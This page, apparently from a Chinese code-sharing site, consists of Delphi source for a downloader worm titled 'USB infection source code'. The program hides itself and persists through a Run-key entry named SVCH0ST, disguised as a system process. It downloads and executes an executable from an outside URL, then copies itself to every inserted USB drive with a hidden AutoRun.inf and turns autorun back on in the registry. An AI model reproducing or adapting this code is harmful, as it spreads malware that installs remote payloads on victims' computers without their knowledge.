下载者U盘传染源码

下载者U盘传染源码

unit Un_Main;


interface


uses
       Windows, Messages, SysUtils,Forms,IniFiles;
type
       TFrm_Main = class(TForm)
       procedure FormCreate(Sender: TObject);
       procedure FormClose(Sender: TObject; var Action: TCloseAction);
       private
       procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
       public
       { Public declarations }
       end;
const
           exefile = 'SVCH0ST.EXE';
           Buffer = 'http://www.888.com/hello.exe';
           DBT_DEVICEARRIVAL = $8000;       // system detected a new device
           DBT_DEVICEREMOVECOMPLETE = $8004;       // device is gone
           DBT_DEVTYP_VOLUME = $00000002;       // logical volume
           DBTF_MEDIA = $0001;       // media comings and goings
type
      PDEV_BROADCAST_HDR = ^TDEV_BROADCAST_HDR;
      TDEV_BROADCAST_HDR = packed record
       dbch_size : DWORD;
       dbch_devicetype : DWORD;
       dbch_reserved : DWORD;
      end;
       PDEV_BROADCAST_VOLUME = ^TDEV_BROADCAST_VOLUME;
       TDEV_BROADCAST_VOLUME = packed record
           dbcv_size : DWORD;
           dbcv_devicetype : DWORD;
           dbcv_reserved : DWORD;
           dbcv_unitmask : DWORD;
           dbcv_flags : WORD;
       end;


function UrlDownLoadToFile(Caller,URL,FileName: PAnsiChar;Reserved: LongWord;
                                       StatusCB: Pointer): LongWord;
                                       stdcall; external 'URLMON.DLL' name 'URLDownloadToFileA';


function WinExec(lpCmdline: PAnsiChar; uCmdShow: LongWord): LongWord;
                           stdcall; external 'kernel32.dll' name 'WinExec';


var
       Frm_Main: TFrm_Main;
       exefull:string;
implementation


{$R *.dfm}


function SetRegValue(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
       result := false;
       RegCreateKey(key,PChar(subkey),regkey);
       if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
       result := true;
       RegCloseKey(regkey);
end;


procedure Startup(var TheName:string);
begin
       SetRegValue(HKEY_LOCAL_MACHINE,'SoftwareMicrosoftWindowsCurrentVersionRun','SVCH0ST',TheName);
       UrlDownloadToFile(nil, PChar(Buffer), PChar(TheName), 0, nil);
       SetFileAttributes(PChar(TheName),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
       messagebox(0,'文件下载成功!','成功',MB_OK);
       WinExec(PChar(TheName), SW_SHOWDEFAULT);
       //Sleep(500);
       //DeleteMe;
       //freemem(@path,256);
end;


procedure TFrm_Main.WMDeviceChange(var Msg: TMessage);
var
       lpdb : PDEV_BROADCAST_HDR;
       lpdbv : PDEV_BROADCAST_VOLUME;
       unitmask:DWORD;
       i:integer;
       MyIni:TIniFile;
       s:Hkey;
       value:dword ;
       inifile:string;
begin
       lpdb := PDEV_BROADCAST_HDR(Msg.LParam);
       case Msg.WParam of
       DBT_DEVICEARRIVAL ://有设备安装完毕


       if lpdb.dbch_devicetype=DBT_DEVTYP_VOLUME then
       begin
           lpdbv := PDEV_BROADCAST_VOLUME(lpdb);
           unitmask:=lpdbv.dbcv_unitmask;//取得设备的盘符
           for i:=0 to 25 do //遍历磁盘
           begin
               if Boolean(unitmask and $1)then//看该驱动器的状态是否发生了变化
               break;
               unitmask := unitmask shr 1;
           end;
           if fileexists(exefull) then       //向u盘拷文件
           begin
           copyfile(PChar(exefull),Pchar(char(i+65) + ':' + exefile),false);
           FileSetAttr(char(i+65) + ':' + exefile,$00000003);
           end;
           inifile:=char(i+65)+':AutoRun.inf';//ini文件
           RegOpenKeyEx(HKEY_CURRENT_USER, 'SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer', 0, KEY_ALL_ACCESS, s);
           value:=0;
           RegSetValueEx(s,'NoDriveTypeAutoRun',0, REG_DWORD,@value, sizeof(value));
           RegCloseKey(s);
           if fileexists(inifile) then
           begin
           FileSetAttr(inifile,$00000000);
           DeleteFile(inifile);
           end;
           MyIni := TIniFile.Create(inifile);
           MyIni.WriteString('AutoRun', 'open',exefile);
           FileSetAttr(inifile,$00000003);
       end;
      end;
end;


procedure TFrm_Main.FormCreate(Sender: TObject);
var
s:hkey;
value:array[0..255]of char;
size:cardinal;
path:array[0..255] of char;
begin
       Application.ShowMainForm:=False;
       getsystemdirectory(path,120);
       exefull := strpas(path) + '' + exefile;
       size:=256;
       RegOpenKeyEx(HKEY_LOCAL_MACHINE,'SoftwareMicrosoftWindowsCurrentVersionRun',0,KEY_ALL_ACCESS,s);
       RegQueryValueEx(s,'SVCH0ST',nil,nil,@value,@size);
       RegCloseKey(s);
       //文件存在且有自启动
       if fileexists('C:WINDOWSsystem32SVCH0ST.EXE') and (UpperCase(value) = UpperCase(exefull)) then
       messagebox(0,'自启动成功!','成功',MB_OK)
       else
       Startup(exefull);//下载执行函数
end;


procedure TFrm_Main.FormClose(Sender: TObject; var Action: TCloseAction);
begin
       Application.Terminate;
end;


end.

你可能感兴趣的:(下载者U盘传染源码)